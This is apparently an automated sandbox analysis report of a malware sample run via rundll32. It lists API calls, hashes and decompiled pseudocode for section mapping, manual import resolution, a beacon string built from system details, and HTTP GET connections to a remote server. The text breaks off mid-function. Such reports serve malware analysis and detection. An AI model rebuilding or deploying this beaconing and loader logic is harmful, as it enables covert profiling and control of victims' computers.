0x044b7467
0x044b7480
0x044b7483
0x044b748a
0x044b7495
0x044b7495
0x00000000
0x044b7470
0x044b7470
0x044b7475
0x044b7477
0x044b7478
0x044b747b
0x00000000
0x044b747b
0x00000000
0x044b7475
0x044b7422
0x044b749c
0x044b749c
0x044b74a2
0x044b74a2
0x044b73fe
0x044b73b5
0x044b73bb
0x044b73c3
0x044b73dc
0x044b73de
0x00000000
0x00000000
0x044b73c5
0x044b73cf
0x044b73d3
0x044b73d9
0x00000000
0x044b73d9
0x044b73d3
0x044b73c3
0x044b74b5
0x044b1cae
0x044b1cae
0x044b1cb5
0x044b1cc0
0x00000000
0x00000000
0x00000000
0x044b1cb5

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76DC81D0,00000000,00000000), ref: 044B739C
InternetReadFile.WININET(?,?,00000004,?), ref: 044B73AB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?,?), ref: 044B73B5
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B742E
InternetReadFile.WININET(?,?,00001000,?), ref: 044B743F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?,?), ref: 044B7449

Part of subcall function 044B4A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76DC81D0,00000000,00000000), ref: 044B4A9C
Part of subcall function 044B4A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,044B593D,00000000,?), ref: 044B4AAC
Part of subcall function 044B4A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 044B4ADE
Part of subcall function 044B4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B03
Part of subcall function 044B4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 044B4B23

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID:
API String ID: 2393427839-0
Opcode ID: e8eb901c503490b3d5c22ad987fe4f2c283c87fd602222137a6929441a0db8ce
Instruction ID: 2c95c6e08deb91fa4231458a5b2324ce43d925360e837127ad86d50da6c7319d
Opcode Fuzzy Hash: e8eb901c503490b3d5c22ad987fe4f2c283c87fd602222137a6929441a0db8ce
Instruction Fuzzy Hash: 4141D332600604AFDF219FA5CC40AEF7BB9EFC4361F11452AE581D7290EA30F9028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401000(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00402067(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401009
0x00401010
0x00401011
0x00401012
0x00401013
0x00401014
0x00401025
0x00401029
0x0040103d
0x00401040
0x00401043
0x0040104a
0x0040104d
0x00401054
0x00401057
0x0040105a
0x0040105d
0x00401062
0x0040109d
0x00401064
0x00401067
0x0040106d
0x00401072
0x00401076
0x00401094
0x00401078
0x0040107f
0x0040108d
0x0040108d
0x00401076
0x004010a5

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 0040105D

Part of subcall function 00402067: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00402094

memset.NTDLL ref: 0040107F

Strings

@, xrefs: 0040104D

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: f88f7b59d057a9b82778a7dd04e6972382e4cc1d9d79e288a0e015176c7d91c1
Instruction ID: 4f385245036f821fd9b68b3b8714d0476cfa35c7cd9381bf75d25f9cc2b375e3
Opcode Fuzzy Hash: f88f7b59d057a9b82778a7dd04e6972382e4cc1d9d79e288a0e015176c7d91c1
Instruction Fuzzy Hash: CB211AB6D00209AFCB11DFA9C8849EEFBB9EF48354F10443AE645F3650D735AA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00402067 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00402067(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00402079
0x0040207f
0x0040208d
0x00402094
0x00402099
0x0040209f
0x00000000
0x004020a0
0x00000000

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00402094

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 3545e7cb7a4688742b4ecc703059954423888001ae5009807625329cafd1149a
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 90F012B590020CBFDB119FA5CC89C9FBBBDEB44354B10497AB252E10D0D6749E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 044B56C8 Relevance: 39.2, APIs: 26, Instructions: 234
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E044B56C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				int _t46;
				intOrPtr _t47;
				int _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr _t86;
				int _t89;
				intOrPtr _t90;
				int _t93;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t100;
				int _t103;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t112;
				void* _t113;
				intOrPtr _t114;
				long _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				long _t119;
				int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;

				_t110 = __edx;
				_t106 = __ecx;
				_t127 =  &_v16;
				_t119 = __eax;
				_t32 =  *0x44ba3e0; // 0x4e69b78
				_v4 = _t32;
				_v8 = 8;
				_t33 = RtlAllocateHeap( *0x44ba2d8, 0, 0x800); // executed
				_t105 = _t33;
				if(_t105 != 0) {
					if(_t119 == 0) {
						_t119 = GetTickCount();
					}
					_t35 =  *0x44ba018; // 0x1af7f861
					asm("bswap eax");
					_t36 =  *0x44ba014; // 0x3a87c8cd
					asm("bswap eax");
					_t37 =  *0x44ba010; // 0xd8d2f808
					asm("bswap eax");
					_t38 =  *0x44ba00c; // 0x8f8f86c2
					asm("bswap eax");
					_t39 =  *0x44ba348; // 0x9ad5a8
					_t3 = _t39 + 0x44bb62b; // 0x74666f73
					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x44ba02c,  *0x44ba004, _t119);
					_t42 = E044B6927();
					_t43 =  *0x44ba348; // 0x9ad5a8
					_t4 = _t43 + 0x44bb66b; // 0x74707526
					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
					_t129 = _t127 + 0x38;
					_t121 = _t120 + _t46;
					if(_a12 != 0) {
						_t100 =  *0x44ba348; // 0x9ad5a8
						_t8 = _t100 + 0x44bb676; // 0x732526
						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
						_t129 = _t129 + 0xc;
						_t121 = _t121 + _t103;
					}
					_t47 =  *0x44ba348; // 0x9ad5a8
					_t10 = _t47 + 0x44bb2de; // 0x74636126
					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
					_t130 = _t129 + 0xc;
					_t122 = _t121 + _t50; // executed
					_t51 = E044B22D7(_t106); // executed
					_t112 = _t51;
					if(_t112 != 0) {
						_t95 =  *0x44ba348; // 0x9ad5a8
						_t12 = _t95 + 0x44bb8d0; // 0x736e6426
						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t98;
						HeapFree( *0x44ba2d8, 0, _t112);
					}
					_t113 = E044B2A11();
					if(_t113 != 0) {
						_t90 =  *0x44ba348; // 0x9ad5a8
						_t14 = _t90 + 0x44bb8d8; // 0x6f687726
						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t93;
						HeapFree( *0x44ba2d8, 0, _t113);
					}
					_t114 =  *0x44ba3cc; // 0x4e695b0
					_a20 = E044B2509(0x44ba00a, _t114 + 4);
					_t55 =  *0x44ba370; // 0x0
					_t116 = 0;
					if(_t55 != 0) {
						_t86 =  *0x44ba348; // 0x9ad5a8
						_t17 = _t86 + 0x44bb8b2; // 0x3d736f26
						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t89;
					}
					_t56 =  *0x44ba36c; // 0x0
					if(_t56 != _t116) {
						_t83 =  *0x44ba348; // 0x9ad5a8
						_t19 = _t83 + 0x44bb889; // 0x3d706926
						wsprintfA(_t122 + _t105, _t19, _t56);
					}
					if(_a20 != _t116) {
						_t123 = RtlAllocateHeap( *0x44ba2d8, _t116, 0x800);
						if(_t123 != _t116) {
							E044B1BE9(GetTickCount());
							_t62 =  *0x44ba3cc; // 0x4e695b0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x44ba3cc; // 0x4e695b0
							__imp__(_t66 + 0x40);
							_t68 =  *0x44ba3cc; // 0x4e695b0
							_t69 = E044B1D33(1, _t110, _t105,  *_t68); // executed
							_t126 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t126 != _t116) {
								StrTrimA(_t126, 0x44b928c);
								_push(_t126);
								_t74 = E044B393C();
								_v20 = _t74;
								if(_t74 != _t116) {
									_t117 = __imp__;
									 *_t117(_t126, _v8);
									 *_t117(_t123, _v8);
									_t118 = __imp__;
									 *_t118(_t123, _v32);
									 *_t118(_t123, _t126);
									_t80 = E044B375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
									_v56 = _t80;
									if(_t80 != 0 && _t80 != 0x10d2) {
										E044B561E();
									}
									HeapFree( *0x44ba2d8, 0, _v48);
									_t116 = 0;
								}
								HeapFree( *0x44ba2d8, _t116, _t126);
							}
							RtlFreeHeap( *0x44ba2d8, _t116, _t123); // executed
						}
						HeapFree( *0x44ba2d8, _t116, _a12);
					}
					RtlFreeHeap( *0x44ba2d8, _t116, _t105); // executed
				}
				return _v16;
			}

0x044b56c8
0x044b56c8
0x044b56c8
0x044b56dd
0x044b56df
0x044b56e4
0x044b56e8
0x044b56f0
0x044b56f6
0x044b56fa
0x044b5702
0x044b570a
0x044b570a
0x044b570c
0x044b5718
0x044b5727
0x044b572c
0x044b572f
0x044b5734
0x044b5737
0x044b573c
0x044b573f
0x044b574b
0x044b5758
0x044b575a
0x044b5760
0x044b5765
0x044b5770
0x044b5772
0x044b5775
0x044b577b
0x044b577d
0x044b5786
0x044b5791
0x044b5793
0x044b5796
0x044b5796
0x044b5798
0x044b579d
0x044b57a9
0x044b57ab
0x044b57ae
0x044b57b0
0x044b57b5
0x044b57b9
0x044b57bb
0x044b57c0
0x044b57cc
0x044b57ce
0x044b57da
0x044b57dc
0x044b57dc
0x044b57e7
0x044b57eb
0x044b57ed
0x044b57f2
0x044b57fe
0x044b5800
0x044b580c
0x044b580e
0x044b580e
0x044b5814
0x044b5827
0x044b582b
0x044b5830
0x044b5834
0x044b5837
0x044b583c
0x044b5847
0x044b5849
0x044b584c
0x044b584c
0x044b584e
0x044b5855
0x044b5858
0x044b585d
0x044b5867
0x044b5869
0x044b5870
0x044b5888
0x044b588c
0x044b5898
0x044b589d
0x044b58a6
0x044b58b7
0x044b58bb
0x044b58c4
0x044b58ca
0x044b58d2
0x044b58d7
0x044b58e4
0x044b58ea
0x044b58f6
0x044b58fc
0x044b58fd
0x044b5902
0x044b5908
0x044b590e
0x044b5915
0x044b591c
0x044b5922
0x044b5929
0x044b592d
0x044b5938
0x044b593d
0x044b5943
0x044b594c
0x044b594c
0x044b595d
0x044b5963
0x044b5963
0x044b596d
0x044b596d
0x044b597b
0x044b597b
0x044b598c
0x044b598c
0x044b599a
0x044b599a
0x044b59ab

APIs

RtlAllocateHeap.NTDLL ref: 044B56F0
GetTickCount.KERNEL32 ref: 044B5704
wsprintfA.USER32 ref: 044B5753
wsprintfA.USER32 ref: 044B5770
wsprintfA.USER32 ref: 044B5791
wsprintfA.USER32 ref: 044B57A9
wsprintfA.USER32 ref: 044B57CC
HeapFree.KERNEL32(00000000,00000000), ref: 044B57DC
wsprintfA.USER32 ref: 044B57FE
HeapFree.KERNEL32(00000000,00000000), ref: 044B580E
wsprintfA.USER32 ref: 044B5847
wsprintfA.USER32 ref: 044B5867
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B5882
GetTickCount.KERNEL32 ref: 044B5892
RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B58A6
RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B58C4
StrTrimA.SHLWAPI(00000000,044B928C,00000000,04E695B0), ref: 044B58F6
lstrcpy.KERNEL32(00000000,?), ref: 044B5915
lstrcpy.KERNEL32(00000000,?), ref: 044B591C
lstrcat.KERNEL32(00000000,?), ref: 044B5929
lstrcat.KERNEL32(00000000,00000000), ref: 044B592D
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 044B595D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 044B596D
RtlFreeHeap.NTDLL(00000000,00000000,00000000,04E695B0), ref: 044B597B
HeapFree.KERNEL32(00000000,?), ref: 044B598C
RtlFreeHeap.NTDLL(00000000,00000000), ref: 044B599A

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
String ID:
API String ID: 2591679948-0
Opcode ID: 9b6b585ec8dad14eaff5029eaf6c6051e541114e6c3c9f9ebc725a1bac4f5798
Instruction ID: 2561da8ad065e4aa016133e2b923175a76d881fda8b4a5ce5babe1aee2efd45f
Opcode Fuzzy Hash: 9b6b585ec8dad14eaff5029eaf6c6051e541114e6c3c9f9ebc725a1bac4f5798
Instruction Fuzzy Hash: DF81D671500704AFEB11AFA9EC48E977BE8EB88704B050525F988E7211DA39ED14DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 044B7AF1 Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E044B7AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E044B6D63(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E044B6C2C(_t56);
					} else {
						E044B6C2C( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E044B7A86) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E044B6E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x44ba348; // 0x9ad5a8
						_t15 = _t59 + 0x44bb73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x044b7af1
0x044b7af1
0x044b7afc
0x044b7b03
0x044b7b0b
0x044b7b15
0x044b7b1b
0x044b7b2e
0x044b7b3e
0x044b7b30
0x044b7b33
0x044b7b38
0x044b7b38
0x044b7b2e
0x044b7b4e
0x044b7b54
0x044b7b59
0x044b7c42
0x00000000
0x044b7b74
0x044b7b77
0x044b7b8a
0x044b7b90
0x044b7b95
0x044b7bbd
0x044b7bd0
0x044b7bda
0x044b7bdd
0x044b7be3
0x044b7be8
0x00000000
0x00000000
0x044b7bec
0x044b7bf8
0x044b7c09
0x044b7c0b
0x044b7c1c
0x044b7c1c
0x044b7c2c
0x00000000
0x044b7c3e
0x00000000
0x044b7c3e
0x00000000
0x00000000
0x00000000
0x044b7b95

APIs

lstrlen.KERNEL32(?,00000008,76D84D40), ref: 044B7B03

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 044B7B26
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 044B7B4E
InternetSetStatusCallback.WININET(00000000,044B7A86), ref: 044B7B65
ResetEvent.KERNEL32(?), ref: 044B7B77
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 044B7B8A
GetLastError.KERNEL32 ref: 044B7B97
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 044B7BDD
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 044B7BFB
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 044B7C1C
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 044B7C28
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 044B7C38
GetLastError.KERNEL32 ref: 044B7C42

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: b2b97b47b806c1d26881e2cf767af8386c3c35c19590de7371c60c01d011b30b
Instruction ID: 5bf633c85e651b6842098d54ee217649844aa599f64a2a8294be5c005ab6552e
Opcode Fuzzy Hash: b2b97b47b806c1d26881e2cf767af8386c3c35c19590de7371c60c01d011b30b
Instruction Fuzzy Hash: 5A419471500604BFEB319F69DC49E9B7BBDEB85705F10492EF582E1290E735AA44CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 044B7F35 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E044B7F35(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x44b0000;
				_t115 = _t139[3] + 0x44b0000;
				_t131 = _t139[4] + 0x44b0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x44b0000;
				_v16 = _t139[5] + 0x44b0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x44b0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x44ba1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x44ba1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x44ba1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x44ba1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x44ba1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x44ba1b8; // 0x0
										 *_t102 = _t125;
										 *0x44ba1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x44ba1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x044b7f44
0x044b7f5a
0x044b7f60
0x044b7f62
0x044b7f67
0x044b7f6d
0x044b7f72
0x044b7f75
0x044b7f83
0x044b7f8a
0x044b7f8d
0x044b7f90
0x044b7f91
0x044b7f94
0x044b7f97
0x044b7f9a
0x044b7f9f
0x044b7fae
0x00000000
0x044b7fb4
0x044b7fbe
0x044b7fc8
0x044b7fcd
0x044b7fcf
0x044b7fd9
0x044b7fdc
0x044b7fdf
0x044b7fe5
0x044b7fe7
0x044b7fe7
0x044b7fea
0x044b7fed
0x044b7ff2
0x044b7ff6
0x044b8009
0x044b800b
0x044b80b3
0x044b80b3
0x044b80ba
0x044b80bd
0x044b80c7
0x044b80c7
0x044b80cb
0x044b8149
0x044b814c
0x044b814e
0x044b814e
0x044b8155
0x044b8157
0x044b8161
0x044b8164
0x044b8167
0x044b8167
0x00000000
0x044b80cd
0x044b80d0
0x044b80fe
0x044b8108
0x044b810c
0x044b8114
0x044b8117
0x044b811e
0x044b8128
0x044b8128
0x044b812c
0x044b8131
0x044b8140
0x044b8146
0x044b8146
0x044b812c
0x00000000
0x044b80d7
0x044b80da
0x044b80e2
0x044b80f7
0x044b80fc
0x00000000
0x00000000
0x044b80fc
0x00000000
0x044b80e2
0x044b80d0
0x044b80cb
0x044b8011
0x044b8018
0x044b8028
0x044b802b
0x044b8031
0x044b8035
0x044b8078
0x044b8084
0x044b80ad
